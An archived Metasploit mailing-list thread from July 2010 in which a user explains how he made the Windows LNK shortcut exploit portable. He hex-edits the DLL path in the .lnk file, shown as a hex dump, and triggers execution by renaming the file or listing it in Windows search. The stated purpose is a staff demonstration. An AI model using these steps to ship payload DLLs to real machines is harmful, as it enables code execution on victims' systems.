metasploit-framework July 2010 archive
Main Archive Page > Month Archives  > metasploit-framework archives
metasploit-framework: Re: [framework] LNK Exploit Export

Re: [framework] LNK Exploit Export

From: Florian Roth <Neo.X_at_nospam>
Date: Sun Jul 25 2010 - 16:39:47 GMT
To: framework <framework@spool.metasploit.com>

Hey, thanks,

I did the following but struggled because it did not work as I
expected.

I changed the contents of the LNK to the name of my DLL.

But that didn't do the trick.
I had to use the following string with a trailing space and double
point.

00000080 00 00 00 6a 00 00 00 00 00 00 20 00 3a 00 43 00 |...j...... .:.C.|
00000090 3a 00 5c 00 42 00 4e 00 57 00 45 00 6a 00 42 00 |:.\.B.N.W.E.j.B.|
000000a0 63 00 66 00 49 00 71 00 2e 00 64 00 6c 00 6c 00 |c.f.I.q...d.l.l.|
000000b0 00 00 |..|
000000b2

The tricky thing is, that changing this does not seem to make it work. I
had to rename the link file to "linkfile.lnk_" in command line and back
in EXPLORER to invoke the process defined in my DLL (calc.exe).

I suppose that the renaming causes a cache to be renewed and EXPLORER to
check the symbol of the link again. Without that it won't envoke the
exploit coded in the DLL in my testing environment.

Additional information:
A second way to invoke the exploiting was to use the windows search and
search for a portion of the LNK file name. The listing of the modified
LNK file in the search results lead also to an execution.

Every method worked only once per session. I had to log off and login
again to make it work another time.

Hope that helped someone.
That way I am able to generate a DLL with a special payload and ship it
with my prepared LNK file.

Thanks

On Sun, 2010-07-25 at 10:30 +0200, Hendrik Baecker wrote:
>
> Am 24.07.10 21:47, schrieb Florian Roth:
> >
> > I noticed that every time I copied the generated DLL and LNK file to a
> > different directory, the exploit does not work anymore. So I suppose
> > that the code is bound to a fixed path where the DLL has to be located.
> >
> Don't suppose - know!
>
> hexdump -C /path/to/your.lnk ^^
>
> > I'd like to send the exploit to a friend who wants to demonstrate the
> > impact to the rest of the IT staff.
> > Is there a possibility to export the exploit or change the absolute path
> > to the DLL so he is able to put the LNK and DLL to i.e. "C:\" ??
> >
>
> I would try to hexedit the lnk to change the voodoo you found by
> hexdump. Didn't try it myself yet, maybe some more knowledge about LNK
> file structure / the weak M$ code is needed.
> I wouldn't say the DLL itself might be a problem - it's just a PE DLL'd
> payload.
>
> Back to your question - I'm not aware of an export function in metasploit.
>
> Cherio!
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework

-- Sincerely Saludos cordiales Mit freundlichen Grüßen Florian Roth Tel: +49 06251 - 827 9402 Mobil: +49 175 - 7240 363 Fax: +49 12125 - 11699510 eMail: Florian.Roth@email.de _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework